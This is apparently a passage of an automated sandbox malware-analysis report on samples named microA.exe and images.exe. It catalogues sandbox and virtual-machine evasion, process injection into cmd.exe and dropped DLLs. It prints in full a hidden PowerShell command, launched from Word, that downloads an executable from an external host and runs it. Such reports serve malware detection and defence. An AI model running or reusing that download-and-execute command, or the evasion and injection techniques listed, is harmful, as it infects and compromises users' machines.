Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\user\AppData\Roaming\microA.exe

Code function: 12_2_00261DB0 rdtsc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 6_2_000007FF00280EDC sldt word ptr [eax]

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\microA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\microA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\microA.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\images.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe

Window / User API: threadDelayed 398

Source: C:\Users\user\AppData\Local\Temp\images.exe	Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1288	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2412	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 1772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2988	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 2396	Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 1360	Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 2420	Thread sleep count: 70 > 30
Source: C:\ProgramData\images.exe TID: 2476	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\images.exe TID: 2328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\images.exe TID: 2176	Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\images.exe TID: 1948	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1980	Thread sleep count: 398 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 1980	Thread sleep time: -4776000s >= -30000s

Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\microA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\microA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\microA.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\images.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: microA.exe, 0000000A.00000002.2168876756.0000000002F39000.00000004.00000001.sdmp	Binary or memory string: OaUqUQEMueYeU
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: images.exe, 00000017.00000000.2226414690.0000000000152000.00000020.00020000.sdmp	Binary or memory string: 1/bkonSBjFeFLKXWUtKcuMsJfafv/KAmzvDO1gn15d2fgItYXzZWwdtJzZG+2XOUlSGDvpEd6QhXtyPSF4+S7umci4l25G+x9rQVMciP5sIWruMYRq2CpuILtnKHm0AvaDpJXRdU86Ek
Source: powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: microA.exe, 0000000A.00000002.2168876756.0000000002F39000.00000004.00000001.sdmp	Binary or memory string: eZf1/bkonSBjFeFLKXWUtKcuMsJfafv/KAmzvDO1gn15d2fgItYXzZWwdtJzZG+2XOUlSGDvpEd6QhXtyPSF4+S7umci4l25G+x9rQVMciP5sIWruMYRq2CpuILtnKHm0AvaDpJXRdU86Ek

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\microA.exe

Code function: 12_2_00261DB0 rdtsc

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03BC81D5 LdrInitializeThunk,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00426222 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0041EB27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00411B38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00411B3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00411E6D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00426222 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0041EB27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00411B38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00411B3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00411E6D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00426222 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0041EB27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00411B38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00411B3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00411E6D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00426222 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0041EB27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00411B38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00411B3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00411E6D mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00406045 GetProcessHeap,RtlAllocateHeap,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\microA.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\microA.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\microA.exe	Process token adjusted: Debug
Source: C:\ProgramData\images.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03BB6118 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Roaming\microA.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\images.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\images.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write

Bypasses PowerShell execution policy

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''

Contains functionality to inject threads in other processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\images.exe

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 400000 value starts with: 4D5A

Injects files into Windows application

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\microA.exe
Source: C:\Windows\System32\notepad.exe	Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 400000
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 401000
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 417000
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 41C000
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 55B000
